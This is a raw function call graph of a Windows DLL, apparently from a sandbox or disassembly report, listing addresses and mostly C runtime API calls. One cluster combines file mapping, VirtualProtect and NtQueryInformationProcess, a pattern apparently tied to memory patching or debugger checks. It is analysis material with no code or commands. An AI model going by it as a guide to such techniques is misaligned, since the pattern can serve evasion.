12242->12248 12243 6ce21a76 CreateFileMappingA 12243->12248 12244 6ce2389c CloseHandle 12244->12248 12245 6ce22193 MapViewOfFile 12245->12248 12246 6ce22115 CloseHandle 12246->12248 12247 6ce24129 CreateFileMappingA 12247->12248 12248->12243 12248->12244 12248->12245 12248->12246 12248->12247 12249 6ce2310e VirtualProtect 12248->12249 12250 6ce2180f CreateFileA 12248->12250 12251 6ce23784 CloseHandle 12248->12251 12252 6ce240b7 CreateFileA 12248->12252 12253 6ce23dfc VirtualProtect 12248->12253 12254 6ce243c0 VirtualProtect 12248->12254 12255 6ce24320 CreateFileA 12248->12255 12256 6ce242ee CloseHandle 12248->12256 12257 6ce2369a CloseHandle 12248->12257 12258 6ce23a09 CreateFileA 12248->12258 12259 6ce2151b GetCurrentProcess 12248->12259 12262 6ce21637 GetModuleFileNameA 12248->12262 12263 6ce215bd K32GetModuleInformation 12248->12263 12264 6ce23981 12248->12264 12266 6ce22e26 VirtualProtect 12248->12266 12268 6ce241d5 CloseHandle 12248->12268 12269 6ce24076 CloseHandle 12248->12269 12249->12248 12250->12248 12251->12248 12252->12248 12253->12248 12254->12248 12255->12248 12256->12248 12257->12248 12258->12248 12286 6ce4f660 12259->12286 12261 6ce21565 GetModuleHandleA 12261->12248 12262->12248 12263->12248 12265 6ce4e890 _ValidateLocalCookies 5 API calls 12264->12265 12267 6ce2398b 12265->12267 12266->12248 12267->12209 12268->12248 12269->12248 12272 6ce26eb9 std::bad_exception::bad_exception 12270->12272 12273 6ce274f5 GetModuleHandleW 12272->12273 12274 6ce27d72 12272->12274 12277 6ce27575 NtQueryInformationProcess 12272->12277 12288 6ce24460 12272->12288 12273->12272 12275 6ce4e890 _ValidateLocalCookies 5 API calls 12274->12275 12276 6ce27d82 12275->12276 12276->12209 12277->12272 12279 6ce27f7e 12278->12279 12280 6ce4e890 _ValidateLocalCookies 5 API calls 12279->12280 12281 6ce28805 12280->12281 12281->12209 12283 6ce1ffc6 12282->12283 12284 6ce4e890 _ValidateLocalCookies 5 API calls 12283->12284 12285 6ce20379 12284->12285 12285->12209 12287 6ce4f677 12286->12287 12287->12261 12287->12287 12289 6ce244c8 12288->12289 12290 6ce4e890 _ValidateLocalCookies 5 API calls 12289->12290 12291 6ce267f5 12290->12291 12291->12272 12299 6ce46e60 12303 6ce46ebb 12299->12303 12300 6ce471fd 12301 6ce4e890 _ValidateLocalCookies 5 API calls 12300->12301 12302 6ce47218 12301->12302 12303->12300 12305 6ce47250 12303->12305 12310 6ce472ab std::bad_exception::bad_exception 12305->12310 12306 6ce4fdac 25 API calls ___std_exception_copy 12306->12310 12307 6ce47a98 12308 6ce4e890 _ValidateLocalCookies 5 API calls 12307->12308 12309 6ce47aa8 12308->12309 12309->12303 12310->12306 12310->12307 12311 6ce55fa0 12314 6ce55fb7 12311->12314 12313 6ce55fb2 12315 6ce55fc5 12314->12315 12316 6ce55fd9 12314->12316 12319 6ce5304b _free 14 API calls 12315->12319 12317 6ce55fe1 12316->12317 12318 6ce55ff3 12316->12318 12320 6ce5304b _free 14 API calls 12317->12320 12327 6ce55ff1 12318->12327 12331 6ce5274f 12318->12331 12321 6ce55fca 12319->12321 12323 6ce55fe6 12320->12323 12328 6ce51828 12321->12328 12326 6ce51828 ___std_exception_copy 25 API calls 12323->12326 12326->12327 12327->12313 12338 6ce517c4 12328->12338 12330 6ce51834 12330->12313 12332 6ce5276f 12331->12332 12356 6ce52c27 GetLastError 12332->12356 12339 6ce52d7e _free 14 API calls 12338->12339 12340 6ce517cf 12339->12340 12343 6ce517dd 12340->12343 12346 6ce51855 IsProcessorFeaturePresent 12340->12346 12342 6ce51827 12344 6ce517c4 ___std_exception_copy 25 API calls 12342->12344 12343->12330 12345 6ce51834 12344->12345 12345->12330 12347 6ce51861 12346->12347 12350 6ce5167c 12347->12350 12351 6ce51698 __DllMainCRTStartup@12 std::bad_exception::bad_exception 12350->12351 12352 6ce516c4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12351->12352 12355 6ce51795 __DllMainCRTStartup@12 12352->12355 12353 6ce4e890 _ValidateLocalCookies 5 API calls 12354 6ce517b3 GetCurrentProcess TerminateProcess 12353->12354 12354->12342 12355->12353 12357 6ce52c3e 12356->12357 12358 6ce52c44 12356->12358 12359 6ce547cf _free 6 API calls 12357->12359 12360 6ce5480e _free 6 API calls 12358->12360 12382 6ce52c4a SetLastError 12358->12382 12359->12358 12361 6ce52c62 12360->12361 12362 6ce5305e _free 14 API calls 12361->12362 12361->12382 12363 6ce52c72 12362->12363 12365 6ce52c91 12363->12365 12366 6ce52c7a 12363->12366 12371 6ce5480e _free 6 API calls 12365->12371 12369 6ce5480e _free 6 API calls 12366->12369 12367 6ce52cde 12391 6ce5270b 12367->12391 12368 6ce5278f 12383 6ce554be 12368->12383 12372 6ce52c88 12369->12372 12374 6ce52c9d 12371->12374 12378 6ce52f67 _free 14 API calls 12372->12378 12375 6ce52ca1 12374->12375 12376 6ce52cb2 12374->12376 12379 6ce5480e _free 6 API calls 12375->12379 12377 6ce52a29 _free 14 API calls 12376->12377 12380 6ce52cbd 12377->12380 12378->12382 12379->12372 12381 6ce52f67 _free 14 API calls 12380->12381 12381->12382 12382->12367 12382->12368 12384 6ce554d1 12383->12384 12385 6ce527a5 12383->12385 12384->12385 12453 6ce558cc 12384->12453 12387 6ce554eb 12385->12387 12388 6ce554fe 12387->12388 12390 6ce55513 12387->12390 12388->12390 12475 6ce53ff0 12388->12475 12402 6ce54d02 12391->12402 12394 6ce5271b 12396 6ce52725 IsProcessorFeaturePresent 12394->12396 12397 6ce52744 12394->12397 12398 6ce52731 12396->12398 12432 6ce51e58 12397->12432 12400 6ce5167c __fassign 8 API calls 12398->12400 12400->12397 12435 6ce54c34 12402->12435 12405 6ce54d47 12406 6ce54d53 ___scrt_is_nonwritable_in_current_image 12405->12406 12407 6ce54d80 __fassign 12406->12407 12408 6ce52d7e _free 14 API calls 12406->12408 12409 6ce54d7a __fassign 12406->12409 12415 6ce54df3 12407->12415 12446 6ce52eba EnterCriticalSection 12407->12446 12408->12409 12409->12407 12410 6ce54dc7 12409->12410 12413 6ce54db1 12409->12413 12411 6ce5304b _free 14 API calls 12410->12411 12412 6ce54dcc 12411->12412 12414 6ce51828 ___std_exception_copy 25 API calls 12412->12414 12413->12394 12414->12413 12418 6ce54e35 12415->12418 12419 6ce54f26 12415->12419 12429 6ce54e64 12415->12429 12424 6ce52c27 __fassign 37 API calls 12418->12424 12418->12429 12420 6ce54f31 12419->12420 12451 6ce52f02 LeaveCriticalSection 12419->12451 12423 6ce51e58 __fassign 23 API calls 12420->12423 12425 6ce54f39 12423->12425 12427 6ce54e59 12424->12427 12425->12394 12426 6ce52c27 __fassign 37 API calls 12430 6ce54eb9 12426->12430 12428 6ce52c27 __fassign 37 API calls 12427->12428 12428->12429 12447 6ce54ed3 12429->12447 12430->12413 12431 6ce52c27 __fassign 37 API calls 12430->12431 12431->12413 12433 6ce51cfe __DllMainCRTStartup@12 23 API calls 12432->12433 12434 6ce51e69 12433->12434 12436 6ce54c40 ___scrt_is_nonwritable_in_current_image 12435->12436 12441 6ce52eba EnterCriticalSection 12436->12441 12438 6ce54c4e 12442 6ce54c8c 12438->12442 12441->12438 12445 6ce52f02 LeaveCriticalSection 12442->12445 12444 6ce52710 12444->12394 12444->12405 12445->12444 12446->12415 12448 6ce54ed9 12447->12448 12450 6ce54eaa 12447->12450 12452 6ce52f02 LeaveCriticalSection 12448->12452 12450->12413 12450->12426 12450->12430 12451->12420 12452->12450 12454 6ce558d8 ___scrt_is_nonwritable_in_current_image 12453->12454 12455 6ce52c27 __fassign 37 API calls 12454->12455 12456 6ce558e1 12455->12456 12463 6ce55927 12456->12463 12466 6ce52eba EnterCriticalSection 12456->12466 12458 6ce558ff 12467 6ce5594d 12458->12467 12463->12385 12464 6ce5270b __fassign 37 API calls 12465 6ce5594c 12464->12465 12466->12458 12468 6ce55910 12467->12468 12469 6ce5595b __fassign 12467->12469 12471 6ce5592c 12468->12471 12469->12468 12470 6ce55680 __fassign 14 API calls 12469->12470 12470->12468 12474 6ce52f02 LeaveCriticalSection 12471->12474 12473 6ce55923 12473->12463 12473->12464 12474->12473 12476 6ce52c27 __fassign 37 API calls 12475->12476 12477 6ce53ffa 12476->12477 12480 6ce53f08 12477->12480 12481 6ce53f14 ___scrt_is_nonwritable_in_current_image 12480->12481 12484 6ce53f2e 12481->12484 12491 6ce52eba EnterCriticalSection 12481->12491 12483 6ce53f35 12483->12390 12484->12483 12487 6ce5270b __fassign 37 API calls 12484->12487 12485 6ce53f6a 12492 6ce53f87 12485->12492 12488 6ce53fa7 12487->12488 12489 6ce53f3e 12489->12485 12490 6ce52f67 _free 14 API calls 12489->12490 12490->12485 12491->12489 12495 6ce52f02 LeaveCriticalSection 12492->12495 12494 6ce53f8e 12494->12484 12495->12494 12496 6ce51e75 12497 6ce51e85 12496->12497 12498 6ce51e8c 12496->12498 12499 6ce51ead 12498->12499 12500 6ce51e97 12498->12500 12520 6ce53fa8 12499->12520 12502 6ce5304b _free 14 API calls 12500->12502 12504 6ce51e9c 12502->12504 12506 6ce51828 ___std_exception_copy 25 API calls 12504->12506 12506->12497 12512 6ce51f11 12514 6ce5304b _free 14 API calls 12512->12514 12513 6ce51f1d 12515 6ce51fab 37 API calls 12513->12515 12516 6ce51f16 12514->12516 12518 6ce51f35 12515->12518 12517 6ce52f67 _free 14 API calls 12516->12517 12517->12497 12518->12516 12519 6ce52f67 _free 14 API calls 12518->12519 12519->12516 12521 6ce53fb1 12520->12521 12522 6ce51eb3 12520->12522 12548 6ce52ce4 12521->12548 12526 6ce539ef GetModuleFileNameW 12522->12526 12527 6ce53a2f 12526->12527 12528 6ce53a1e GetLastError 12526->12528 12754 6ce53768 12527->12754 12749 6ce53015 12528->12749 12531 6ce53a2a 12534 6ce4e890 _ValidateLocalCookies 5 API calls 12531->12534 12535 6ce51ec6 12534->12535 12536 6ce51fab 12535->12536 12537 6ce51fd0 12536->12537 12540 6ce52030 12537->12540 12793 6ce542ce 12537->12793 12539 6ce51efb 12542 6ce5211f 12539->12542 12540->12539 12541 6ce542ce 37 API calls 12540->12541 12541->12540 12543 6ce52130 12542->12543 12544 6ce51f08 12542->12544 12543->12544 12545 6ce5305e _free 14 API calls 12543->12545 12544->12512 12544->12513 12546 6ce52159 12545->12546 12547 6ce52f67 _free 14 API calls 12546->12547 12547->12544 12549 6ce52cf5 12548->12549 12550 6ce52cef 12548->12550 12552 6ce5480e _free 6 API calls 12549->12552 12554 6ce52cfb 12549->12554 12551 6ce547cf _free 6 API calls 12550->12551 12551->12549 12553 6ce52d0f 12552->12553 12553->12554 12556 6ce5305e _free 14 API calls 12553->12556 12555 6ce5270b __fassign 37 API calls 12554->12555 12561 6ce52d74 12554->12561 12557 6ce52d7d 12555->12557 12558 6ce52d1f 12556->12558 12559 6ce52d27 12558->12559 12560 6ce52d3c 12558->12560 12563 6ce5480e _free 6 API calls 12559->12563 12562 6ce5480e _free 6 API calls 12560->12562 12573 6ce53df4 12561->12573 12564 6ce52d48 12562->12564 12565 6ce52d33 12563->12565 12566 6ce52d4c 12564->12566 12567 6ce52d5b 12564->12567 12568 6ce52f67 _free 14 API calls 12565->12568 12569 6ce5480e _free 6 API calls 12566->12569 12570 6ce52a29 _free 14 API calls 12567->12570 12568->12554 12569->12565 12571 6ce52d66 12570->12571 12572 6ce52f67 _free 14 API calls 12571->12572 12572->12554 12574 6ce53f08 __fassign 37 API calls 12573->12574 12575 6ce53e07 12574->12575 12592 6ce53b9e 12575->12592 12578 6ce53e20 12578->12522 12581 6ce53e63 12584 6ce52f67 _free 14 API calls 12581->12584 12585 6ce53e71 12584->12585 12585->12522 12586 6ce53e5e 12587 6ce5304b _free 14 API calls 12586->12587 12587->12581 12588 6ce53ea5 12588->12581 12617 6ce53a90 12588->12617 12589 6ce53e79 12589->12588 12590 6ce52f67 _free 14 API calls 12589->12590 12590->12588 12593 6ce5274f __fassign 37 API calls 12592->12593 12594 6ce53bb0 12593->12594 12595 6ce53bd1 12594->12595 12596 6ce53bbf GetOEMCP 12594->12596 12597 6ce53be8 12595->12597 12598 6ce53bd6 GetACP 12595->12598 12596->12597 12597->12578 12599 6ce52f19 12597->12599 12598->12597 12600 6ce52f57 12599->12600 12604 6ce52f27 _free 12599->12604 12601 6ce5304b _free 14 API calls 12600->12601 12603 6ce52f55 12601->12603 12602 6ce52f42 HeapAlloc 12602->12603 12602->12604 12603->12581 12606 6ce54003 12603->12606 12604->12600 12604->12602 12625 6ce5192a 12604->12625 12607 6ce53b9e 39 API calls 12606->12607 12608 6ce54023 12607->12608 12609 6ce54099 std::bad_exception::bad_exception 12608->12609 12610 6ce5405d IsValidCodePage 12608->12610 12611 6ce4e890 _ValidateLocalCookies 5 API calls 12609->12611 12610->12609 12613 6ce5406f 12610->12613 12612 6ce53e56 12611->12612 12612->12586 12612->12589 12614 6ce5409e GetCPInfo 12613->12614 12616 6ce54078 std::bad_exception::bad_exception 12613->12616 12614->12609 12614->12616 12639 6ce53c74 12616->12639 12618 6ce53a9c ___scrt_is_nonwritable_in_current_image 12617->12618 12723 6ce52eba EnterCriticalSection 12618->12723 12620 6ce53aa6 12724 6ce53add 12620->12724 12628 6ce51957 12625->12628 12629 6ce51963 ___scrt_is_nonwritable_in_current_image 12628->12629 12634 6ce52eba EnterCriticalSection 12629->12634 12631 6ce5196e 12635 6ce519aa 12631->12635 12634->12631 12638 6ce52f02 LeaveCriticalSection 12635->12638 12637 6ce51935 12637->12604 12638->12637 12640 6ce53c9c GetCPInfo 12639->12640 12649 6ce53d65 12639->12649 12641 6ce53cb4 12640->12641 12640->12649 12650 6ce56044 12641->12650 12642 6ce4e890 _ValidateLocalCookies 5 API calls 12644 6ce53df2 12642->12644 12644->12609 12648 6ce56351 41 API calls 12648->12649 12649->12642 12651 6ce5274f __fassign 37 API calls 12650->12651 12652 6ce56064 12651->12652 12670 6ce542ff 12652->12670 12654 6ce56122 12655 6ce4e890 _ValidateLocalCookies 5 API calls 12654->12655 12658 6ce53d1c 12655->12658 12656 6ce56091 12656->12654 12657 6ce52f19 15 API calls 12656->12657 12661 6ce560b7 std::bad_exception::bad_exception 12656->12661 12657->12661 12665 6ce56351 12658->12665 12659 6ce5611c 12673 6ce56147 12659->12673 12661->12659 12662 6ce542ff __fassign MultiByteToWideChar 12661->12662 12663 6ce56105 12662->12663 12663->12659 12664 6ce5610c GetStringTypeW 12663->12664 12664->12659 12666 6ce5274f __fassign 37 API calls 12665->12666 12667 6ce56364 12666->12667 12677 6ce56167 12667->12677 12671 6ce54310 MultiByteToWideChar 12670->12671 12671->12656 12674 6ce56164 12673->12674 12675 6ce56153 12673->12675 12674->12654 12675->12674 12676 6ce52f67 _free 14 API calls 12675->12676 12676->12674 12678 6ce56182 12677->12678 12679 6ce542ff __fassign MultiByteToWideChar 12678->12679 12682 6ce561c6 12679->12682 12680 6ce5632b 12681 6ce4e890 _ValidateLocalCookies 5 API calls 12680->12681 12683 6ce53d3d 12681->12683 12682->12680 12685 6ce52f19 15 API calls 12682->12685 12689 6ce561eb 12682->12689 12683->12648 12684 6ce56290 12688 6ce56147 __freea 14 API calls 12684->12688 12685->12689 12686 6ce542ff __fassign MultiByteToWideChar 12687 6ce56231 12686->12687 12687->12684 12705 6ce5489b 12687->12705 12688->12680 12689->12684 12689->12686 12692 6ce56267 12692->12684 12696 6ce5489b 6 API calls 12692->12696 12693 6ce5629f 12694 6ce52f19 15 API calls 12693->12694 12698 6ce562b1 12693->12698 12694->12698 12695 6ce5631c 12697 6ce56147 __freea 14 API calls 12695->12697 12696->12684 12697->12684 12698->12695 12699 6ce5489b 6 API calls 12698->12699 12700 6ce562f9 12699->12700 12700->12695 12711 6ce5437b 12700->12711 12702 6ce56313 12702->12695 12703 6ce56348 12702->12703 12704 6ce56147 __freea 14 API calls 12703->12704 12704->12684 12714 6ce54574 12705->12714 12708 6ce548ac 12708->12684 12708->12692 12708->12693 12710 6ce548ec LCMapStringW 12710->12708 12712 6ce54392 WideCharToMultiByte 12711->12712 12712->12702 12715 6ce5466f _free 5 API calls 12714->12715 12716 6ce5458a 12715->12716 12716->12708 12717 6ce548f8 12716->12717 12720 6ce5458e 12717->12720 12719 6ce54903 12719->12710 12721 6ce5466f _free 5 API calls 12720->12721 12722 6ce545a4 12721->12722 12722->12719 12723->12620 12734 6ce541f6 12724->12734 12726 6ce53aff 12727 6ce541f6 25 API calls 12726->12727 12728 6ce53b1e 12727->12728 12729 6ce53ab3 12728->12729 12730 6ce52f67 _free 14 API calls 12728->12730 12731 6ce53ad1 12729->12731 12730->12729 12748 6ce52f02 LeaveCriticalSection 12731->12748 12733 6ce53abf 12733->12581 12735 6ce54207 12734->12735 12744 6ce54203 ___scrt_uninitialize_crt 12734->12744 12736 6ce5420e 12735->12736 12739 6ce54221 std::bad_exception::bad_exception 12735->12739 12737 6ce5304b _free 14 API calls 12736->12737 12738 6ce54213 12737->12738 12740 6ce51828 ___std_exception_copy 25 API calls 12738->12740 12741 6ce5424f 12739->12741 12742 6ce54258 12739->12742 12739->12744 12740->12744 12743 6ce5304b _free 14 API calls 12741->12743 12742->12744 12746 6ce5304b _free 14 API calls 12742->12746 12745 6ce54254 12743->12745 12744->12726 12747 6ce51828 ___std_exception_copy 25 API calls 12745->12747 12746->12745 12747->12744 12748->12733 12780 6ce53038 12749->12780 12751 6ce53020 _free 12752 6ce5304b _free 14 API calls 12751->12752 12753 6ce53033 12752->12753 12753->12531 12755 6ce5274f __fassign 37 API calls 12754->12755 12756 6ce5377a 12755->12756 12757 6ce5378c 12756->12757 12783 6ce54732 12756->12783 12759 6ce538ed 12757->12759 12760 6ce53909 12759->12760 12776 6ce538fa 12759->12776 12761 6ce53936 12760->12761 12762 6ce53911 12760->12762 12763 6ce5437b ___scrt_uninitialize_crt WideCharToMultiByte 12761->12763 12762->12776 12789 6ce539b4 12762->12789 12765 6ce53946 12763->12765 12766 6ce53963 12765->12766 12767 6ce5394d GetLastError 12765->12767 12771 6ce539b4 14 API calls 12766->12771 12774 6ce53974 12766->12774 12768 6ce53015 __dosmaperr 14 API calls 12767->12768 12770 6ce53959 12768->12770 12769 6ce5437b ___scrt_uninitialize_crt WideCharToMultiByte 12772 6ce5398c 12769->12772 12773 6ce5304b _free 14 API calls 12770->12773 12771->12774 12775 6ce53993 GetLastError 12772->12775 12772->12776 12773->12776 12774->12769 12774->12776 12777 6ce53015 __dosmaperr 14 API calls 12775->12777 12776->12531 12778 6ce5399f 12777->12778 12779 6ce5304b _free 14 API calls 12778->12779 12779->12776 12781 6ce52d7e _free 14 API calls 12780->12781 12782 6ce5303d 12781->12782 12782->12751 12786 6ce5455a 12783->12786 12787 6ce5466f _free 5 API calls 12786->12787 12788 6ce54570 12787->12788 12788->12757 12790 6ce539bf 12789->12790 12791 6ce5304b _free 14 API calls 12790->12791 12792 6ce539c8 12791->12792 12792->12776 12796 6ce54277 12793->12796 12797 6ce5274f __fassign 37 API calls 12796->12797 12798 6ce5428b 12797->12798 12798->12537 12799 6ce185f0 12800 6ce1864b 12799->12800 12801 6ce4e890 _ValidateLocalCookies 5 API calls 12800->12801 12802 6ce18e78 12801->12802 12803 6ce522f4 12804 6ce52306 12803->12804 12805 6ce5230c 12803->12805 12807 6ce5229c 12804->12807 12808 6ce522a9 12807->12808 12809 6ce522c6 12807->12809 12810 6ce522c0 12808->12810 12811 6ce52f67 _free 14 API calls 12808->12811 12809->12805 12812 6ce52f67 _free 14 API calls 12810->12812 12811->12808 12812->12809 12821 6ce559b0 12822 6ce559ea 12821->12822 12823 6ce5304b _free 14 API calls 12822->12823 12828 6ce559fe 12822->12828 12824 6ce559f3 12823->12824 12826 6ce51828 ___std_exception_copy 25 API calls 12824->12826 12825 6ce4e890 _ValidateLocalCookies 5 API calls 12827 6ce55a0b 12825->12827 12826->12828 12828->12825 12829 6ce4f5fe 12832 6ce4fe0f 12829->12832 12831 6ce4f613 12833 6ce4fe23 12832->12833 12834 6ce4fe1c 12832->12834 12833->12831 12835 6ce519be ___std_exception_destroy 14 API calls 12834->12835 12835->12833 12836 6ce52e79 12837 6ce52e84 12836->12837 12839 6ce52ead 12837->12839 12840 6ce52ea9 12837->12840 12842 6ce54850 12837->12842 12847 6ce52ed1 12839->12847 12843 6ce5466f _free 5 API calls 12842->12843 12844 6ce5486c 12843->12844 12845 6ce5488a InitializeCriticalSectionAndSpinCount 12844->12845 12846 6ce54875 12844->12846 12845->12846 12846->12837 12848 6ce52efd 12847->12848 12849 6ce52ede 12847->12849 12848->12840 12850 6ce52ee8 DeleteCriticalSection 12849->12850 12850->12848 12850->12850 11520 6ce4ec44 11521 6ce4ec52 11520->11521 11522 6ce4ec4d 11520->11522 11526 6ce4eb0e 11521->11526 11541 6ce4ee28 11522->11541 11528 6ce4eb1a ___scrt_is_nonwritable_in_current_image 11526->11528 11527 6ce4eb43 dllmain_raw 11530 6ce4eb29 11527->11530 11531 6ce4eb5d dllmain_crt_dispatch 11527->11531 11528->11527 11529 6ce4eb3e 11528->11529 11528->11530 11545 6ce2e500 11529->11545 11531->11529 11531->11530 11534 6ce4ebaf 11534->11530 11535 6ce4ebb8 dllmain_crt_dispatch 11534->11535 11535->11530 11536 6ce4ebcb dllmain_raw 11535->11536 11536->11530 11537 6ce2e500 __DllMainCRTStartup@12 5 API calls 11538 6ce4eb96 11537->11538 11549 6ce4ea5e 11538->11549 11540 6ce4eba4 dllmain_raw 11540->11534 11542 6ce4ee3e 11541->11542 11544 6ce4ee47 11542->11544 11874 6ce4eddb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11542->11874 11544->11521 11546 6ce2e52a 11545->11546 11576 6ce4e890 11546->11576 11548 6ce2ec0b 11548->11534 11548->11537 11550 6ce4ea6a ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11549->11550 11551 6ce4eb06 11550->11551 11552 6ce4ea9b 11550->11552 11568 6ce4ea73 11550->11568 11605 6ce4f194 IsProcessorFeaturePresent 11551->11605 11584 6ce4efc3 11552->11584 11555 6ce4eaa0 11593 6ce4ee7f 11555->11593 11557 6ce4eb0d ___scrt_is_nonwritable_in_current_image 11558 6ce4eb29 11557->11558 11559 6ce4eb43 dllmain_raw 11557->11559 11561 6ce4eb3e 11557->11561 11558->11540 11559->11558 11562 6ce4eb5d dllmain_crt_dispatch 11559->11562 11560 6ce4eaa5 __RTC_Initialize __DllMainCRTStartup@12 11596 6ce4f166 11560->11596 11565 6ce2e500 __DllMainCRTStartup@12 5 API calls 11561->11565 11562->11558 11562->11561 11567 6ce4eb7e 11565->11567 11569 6ce4ebaf 11567->11569 11572 6ce2e500 __DllMainCRTStartup@12 5 API calls 11567->11572 11568->11540 11569->11558 11570 6ce4ebb8 dllmain_crt_dispatch 11569->11570 11570->11558 11571 6ce4ebcb dllmain_raw 11570->11571 11571->11558 11573 6ce4eb96 11572->11573 11574 6ce4ea5e __DllMainCRTStartup@12 79 API calls 11573->11574 11575 6ce4eba4 dllmain_raw 11574->11575 11575->11569 11577 6ce4e898 11576->11577 11578 6ce4e899 IsProcessorFeaturePresent 11576->11578 11577->11548 11580 6ce4eca4 11578->11580 11583 6ce4ec67 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11580->11583 11582 6ce4ed87 11582->11548 11583->11582 11585 6ce4efc8 ___scrt_release_startup_lock 11584->11585 11586 6ce4efcc 11585->11586 11588 6ce4efd8 __DllMainCRTStartup@12 11585->11588 11609 6ce5249b 11586->11609 11590 6ce4efe5 11588->11590 11612 6ce51cfe 11588->11612 11590->11555 11746 6ce50ede InterlockedFlushSList 11593->11746 11597 6ce4f172 11596->11597 11598 6ce4eac4 11597->11598 11753 6ce52633 11597->11753 11602 6ce4eb00 11598->11602 11600 6ce4f180 11758 6ce50f36 11600->11758 11857 6ce4efe6 11602->11857 11606 6ce4f1aa __DllMainCRTStartup@12 std::bad_exception::bad_exception 11605->11606 11607 6ce4f255 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11606->11607 11608 6ce4f2a0 __DllMainCRTStartup@12 11607->11608 11608->11557 11623 6ce52366 11609->11623 11613 6ce51d0c 11612->11613 11621 6ce51d1d 11612->11621 11694 6ce51da4 GetModuleHandleW 11613->11694 11618 6ce51d57 11618->11555 11701 6ce51bc4 11621->11701 11624 6ce52372 ___scrt_is_nonwritable_in_current_image 11623->11624 11631 6ce52eba EnterCriticalSection 11624->11631 11626 6ce52380 11632 6ce523c1 11626->11632 11631->11626 11633 6ce523e0 11632->11633 11634 6ce5238d 11632->11634 11633->11634 11639 6ce52f67 11633->11639 11636 6ce523b5 11634->11636 11693 6ce52f02 LeaveCriticalSection 11636->11693 11638 6ce4efd6 11638->11555 11640 6ce52f72 HeapFree 11639->11640 11641 6ce52f9b _free 11639->11641 11640->11641 11642 6ce52f87 11640->11642 11641->11634 11645 6ce5304b 11642->11645 11648 6ce52d7e GetLastError 11645->11648 11647 6ce52f8d GetLastError 11647->11641 11649 6ce52d95 11648->11649 11653 6ce52d9b 11648->11653 11671 6ce547cf 11649->11671 11669 6ce52da1 SetLastError 11653->11669 11676 6ce5480e 11653->11676 11657 6ce52dd1 11660 6ce5480e _free 6 API calls 11657->11660 11658 6ce52de8 11659 6ce5480e _free 6 API calls 11658->11659 11661 6ce52df4 11659->11661 11662 6ce52ddf 11660->11662 11663 6ce52e09 11661->11663 11664 6ce52df8 11661->11664 11667 6ce52f67 _free 12 API calls 11662->11667 11688 6ce52a29 11663->11688 11665 6ce5480e _free 6 API calls 11664->11665 11665->11662 11667->11669 11669->11647 11670 6ce52f67 _free 12 API calls 11670->11669 11672 6ce5466f _free 5 API calls 11671->11672 11673 6ce547eb 11672->11673 11674 6ce547f4 11673->11674 11675 6ce54806 TlsGetValue 11673->11675 11674->11653 11677 6ce5466f _free 5 API calls 11676->11677 11678 6ce5482a 11677->11678 11679 6ce52db9 11678->11679 11680 6ce54848 TlsSetValue 11678->11680 11679->11669 11681 6ce5305e 11679->11681 11686 6ce5306b _free 11681->11686 11682 6ce530ab 11685 6ce5304b _free 13 API calls 11682->11685 11683 6ce53096 HeapAlloc 11684 6ce52dc9 11683->11684 11683->11686 11684->11657 11684->11658 11685->11684 11686->11682 11686->11683 11687 6ce5192a _free EnterCriticalSection LeaveCriticalSection 11686->11687 11687->11686 11689 6ce528bd _free EnterCriticalSection LeaveCriticalSection 11688->11689 11690 6ce52a97 11689->11690 11691 6ce529cf _free 14 API calls 11690->11691 11692 6ce52ac0 11691->11692 11692->11670 11693->11638 11695 6ce51d11 11694->11695 11695->11621 11696 6ce51de7 GetModuleHandleExW 11695->11696 11697 6ce51e06 GetProcAddress 11696->11697 11698 6ce51e1b 11696->11698 11697->11698 11699 6ce51e2f FreeLibrary 11698->11699 11700 6ce51e38 11698->11700 11699->11700 11700->11621 11702 6ce51bd0 ___scrt_is_nonwritable_in_current_image 11701->11702 11717 6ce52eba EnterCriticalSection 11702->11717 11704 6ce51bda 11718 6ce51c11 11704->11718 11706 6ce51be7 11722 6ce51c05 11706->11722 11709 6ce51d62 11726 6ce52fa1 GetPEB 11709->11726 11712 6ce51d91 11715 6ce51de7 __DllMainCRTStartup@12 3 API calls 11712->11715 11713 6ce51d71 GetPEB 11713->11712 11714 6ce51d81 GetCurrentProcess TerminateProcess 11713->11714 11714->11712 11716 6ce51d99 ExitProcess 11715->11716 11717->11704 11719 6ce51c1d ___scrt_is_nonwritable_in_current_image 11718->11719 11720 6ce5249b __DllMainCRTStartup@12 14 API calls 11719->11720 11721 6ce51c7e __DllMainCRTStartup@12 11719->11721 11720->11721 11721->11706 11725 6ce52f02 LeaveCriticalSection 11722->11725 11724 6ce51bf3 11724->11618 11724->11709 11725->11724 11727 6ce52fbb 11726->11727 11728 6ce51d6c 11726->11728 11730 6ce546f2 11727->11730 11728->11712 11728->11713 11733 6ce5466f 11730->11733 11732 6ce5470e 11732->11728 11734 6ce5469d 11733->11734 11737 6ce54699 _free 11733->11737 11734->11737 11739 6ce545a8 11734->11739 11737->11732 11738 6ce546b7 GetProcAddress 11738->11737 11742 6ce545b9 ___vcrt_FlsSetValue 11739->11742 11740 6ce54664 11740->11737 11740->11738 11741 6ce545d7 LoadLibraryExW 11741->11742 11743 6ce545f2 GetLastError 11741->11743 11742->11740 11742->11741 11744 6ce5464d FreeLibrary 11742->11744 11745 6ce54625 LoadLibraryExW 11742->11745 11743->11742 11744->11742 11745->11742 11748 6ce50eee 11746->11748 11749 6ce4ee89 11746->11749 11748->11749 11750 6ce519be 11748->11750 11749->11560 11751 6ce52f67 _free 14 API calls 11750->11751 11752 6ce519d6 11751->11752 11752->11748 11754 6ce52650 ___scrt_uninitialize_crt 11753->11754 11755 6ce5263e 11753->11755 11754->11600 11756 6ce5264c 11755->11756 11764 6ce5521d 11755->11764 11756->11600 11759 6ce50f3f 11758->11759 11760 6ce50f49 11758->11760 11830 6ce5131c 11759->11830 11760->11598 11767 6ce550cb 11764->11767 11770 6ce5501f 11767->11770 11771 6ce5502b ___scrt_is_nonwritable_in_current_image 11770->11771 11778 6ce52eba EnterCriticalSection 11771->11778 11773 6ce550a1 11787 6ce550bf 11773->11787 11774 6ce55035 ___scrt_uninitialize_crt 11774->11773 11779 6ce54f93 11774->11779 11778->11774 11780 6ce54f9f ___scrt_is_nonwritable_in_current_image 11779->11780 11790 6ce5533a EnterCriticalSection 11780->11790 11782 6ce54fa9 ___scrt_uninitialize_crt 11786 6ce54fe2 11782->11786 11791 6ce551d5 11782->11791 11801 6ce55013 11786->11801 11829 6ce52f02 